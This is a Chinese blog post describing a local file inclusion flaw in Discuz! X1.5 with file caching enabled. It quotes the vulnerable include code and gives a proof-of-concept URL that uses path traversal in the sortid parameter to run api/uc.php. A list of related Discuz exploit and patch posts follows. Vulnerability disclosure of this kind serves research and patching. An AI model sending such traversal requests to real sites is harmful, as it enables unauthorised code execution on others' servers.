discuz api uc.php 漏洞,DISCUZ X1.5 本地文件包含漏洞

于 2021-03-18 02:54:26 发布
阅读量295 收藏
点赞数
文章标签: discuz api uc.php 漏洞

DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存。

config_global.php

$_config['cache']['type'] = ‘file’;

function cachedata($cachenames) {

……

$isfilecache = getglobal(‘config/cache/type’) == ‘file’;

……

if($isfilecache) {

$lostcaches = array();

foreach($cachenames as $cachename) {

if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {

$lostcaches[] = $cachename;

}

}

……

}

地址:

http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc

http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried

执行了 api/uc.php 页面代码了。

作者: Jannock

亮叔叔
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
saiav.win forum.php,关于 DiscuzX3.4 UC_Server 本地文件包含漏洞
weixin_39911567的博客
03-22 4519
最近又发现discuz论坛被挂马了,决定好好研究一下discuz漏洞,技术债始终要还是要还的一、问题发现快要睡觉的时候,突然收到一封邮件,发现服务器上的文件被篡改了,立即登录服务器,清空恶意文件,并将其锁定(为什么不是移走呢 ? )然后迅速找到所有有问题的文件,那么这里如何找 ?这个时候你会发现日志是一个好东西,记录所有的访问记录 解码之后,发现其中一条记录是这样的 但是这些信息并没有什么用,还...
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
最新发布
记录开发和安全学习过程中的点点滴滴
04-22 1808
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
Discuz漏洞整理.pdf
11-15
Discuz漏洞整理,基本囊括了所有已知discuz漏洞,推荐人群为:渗透测试工程师/安全研究员
DISCUZX1.5 本地文件包含
Yatere的天平秤
04-25 626
<br />DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存。<br /><br />config_global.php<br />$_config['cache']['type'] = ‘file’;<br /><br />function cachedata($cachenames) {<br />……<br />$isfilecache = getglobal(‘config/cache/type’) == ‘file’;<br />……<br />if($isfi
Discuz! X1.5 getshell 0day
weixin_33858485的博客
06-27 580
Discuz! X1.5 getshell 0day 利用代码如下 <?php print_r(' +---------------------------------------------------------------------------+ Discuz! X1-1.5 notify_credit.php Blind SQL injectio...
discuz api php,discuz api uc.php 漏洞
weixin_32349711的博客
03-10 144
Re阿里提示Discuz uc.key泄露导致代码注入漏洞uc.php的解决方法if(!API_UPDATEBADWORDS) {return API_RETURN_FORBIDDEN;}$data = array();if(is_array($post)) {foreach($post as $k =...
api uc.php 漏洞,discuz api uc.php 漏洞
weixin_36212198的博客
03-11 71
Re阿里提示Discuz uc.key泄露导致代码注入漏洞uc.php的解决方法if(!API_UPDATEBADWORDS) {return API_RETURN_FORBIDDEN;}$data = array();if(is_array($post)) {foreach($post as $k =...
商业源码-编程源码-Discuz! v6.1.0F Build 081117 繁体中文版 Big5 无UC非官方.zip
06-15
在您提供的压缩包文件中,我们看到的是Discuz! v6.1.0F Build 081117的两个版本,分别是繁体中文版(Big5编码)和简体中文GBK编码。这两个版本都是针对中文用户设计的,但在字符编码上有所不同,适应不同的地区和...
Discuz快照被劫持:DZ被挂马常被利用漏洞都在这
lixon166的博客
02-23 1594
0x00 网站快照劫持:DZ常见漏洞利用分析 0x01Discuz上传图片附件实现远程命令执行漏洞 漏洞产生过程:forum_image.php中的$w,$h变量可控,末处理直接传入Thumb()函数,经该函数传入Thumb_IM()函数,最终调用exec()导致远程命令执行漏洞。 通过分析可知:需要forum.php调用image_class模块调用图像预览功能,后台上传设置为ImagicMagick库,默认为GD库渲染。前台登录发贴上传图片附件。 提示:forum.php是常被利用的文...
discuz x3.2 xtlsoft修改版本
10-26
《XTLSoft 修改版 Discuz! X3.2:打造高效论坛系统》 Discuz! X3.2是由Comsenz公司开发的一款流行的开源社区论坛软件,它以其强大的功能、灵活的扩展性和易于管理的特性深受广大用户喜爱。XTLSoft作为一家专注于...
付费浏览帖子(看帖扣分)For Discuz!X2 & X1.5
04-16
付费浏览帖子(看帖扣分)For Discuz!X2 & X1.5
[反馈BUG] Discuz! X1.5 BUG 修复方法(基于 20110121 版本)
weixin_34199335的博客
03-08 108
 http://www.discuz.net/thread-2040599-1-1.html
discuz x1.5 discuz 7.2 后台getshell 0day通杀版出来
收集盒 Book box
03-20 2515
<br />discuz x1.5 discuz 7.2 后台getshell 0day通杀版,不知海浪做好防御没有~~~<br /><br /><br />附上 <br />从Discuz!古老的6.0版本开始,漏洞都出现在扩展插件上,利用方式有所不同,下面开始。<br />一 Discuz! 6.0 和 Discuz! 7.0<br />既然要后台拿Shell,文件写入必看。<br />/include/cache.func.php<br /><br />往上翻,找到调用函数的地方.都在updateca
阿里云提示Discuz uc.key泄露导致代码注入漏洞uc.php的解决方法
weixin_33811961的博客
12-13 194
适用所有用UC整合 阿里云提示漏洞discuz中的/api/uc.php存在代码写入漏洞,导致黑客可写入恶意代码获取uckey,..........   漏洞名称:Discuz uc.key泄露导致代码注入漏洞 补丁文件:/api/uc.php补丁来源:云盾自研   解决方法:找到文件/api/uc.php​ 中的以下代码: $configfile = substr...
api uc.php 漏洞,Discuz7.2及以下版本 /api/uc.php uc.key泄露导致代码注入漏洞补丁
weixin_34010461的博客
03-11 332
这个漏洞已经在discuz! x1版本悄悄给补上了,但是7.2及以下含有uc接口的版本的均没有补。当然,漏洞是依旧是鸡肋的,想要利用这个漏洞,必须满足两点条件:1.必须知道UC_KEY,通常在配置文件里,或者ucenter的原始(没有经过修改的)数据库(应用)中;2.配置文件config.inc.php必须可写。一、漏洞代码:...functionupdateapps($get,$post)...
discuz漏洞汇总
热门推荐
hacker0ne的博客
05-05 5万+
Discuz漏洞拿服务器 路径泄露 ‘api/addons/zendcheck.php’, ‘api/addons/zendcheck52.php’, ‘api/addons/zendcheck53.php’, ‘source/plugin/mobile/api/1/index.php’, ...
Discuz!uc.key泄露导致代码注入漏洞uc.php的解决方法
土著人宁巴的Discuz!专栏
04-06 1万+
漏洞名称:Discuz uc.key泄露导致代码注入漏洞 漏洞描述:在Discuz中,uc_key是UC客户端与服务端通信的通信密钥,discuz中的/api/uc.php存在代码写入漏洞,导致黑客可写入恶意代码获取uckey,最终进入网站后台,造成数据泄漏。您也可以登录官方网站更新到最新版本解决。 最近用某云服务器的朋友比较多,都来反馈~这个漏洞,现在把修复方案分享下吧 打开/api/uc
ThinkPHPDiscuz通过Ucenter同步登录过程记录
Eric__Cui的博客
09-07 5246
protected function _initialize(){ if(checkLogin()){ $this->autologin(); } } public function autologin() { if (isset($_COOKIE['8asp_2132_auth']) && !empty($_COOKIE['8asp_2132_auth'])) {
ucenter api/uc.php数据密匙验证
weixin_34021089的博客
05-07 258
为什么80%的码农都做不了架构师?>>> ...
Discuz! X1.5程序结构详解:目录、文件与模板
X1.5的程序目录、文件列表及模板文件结构说明" Discuz! X1.5 是一个社区建站平台,它将论坛(BBS)、社交网络(SNS)、门户(Portal)、群组(Group)以及开放平台(Open Platform)融为一体,旨在为用户提供一站...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值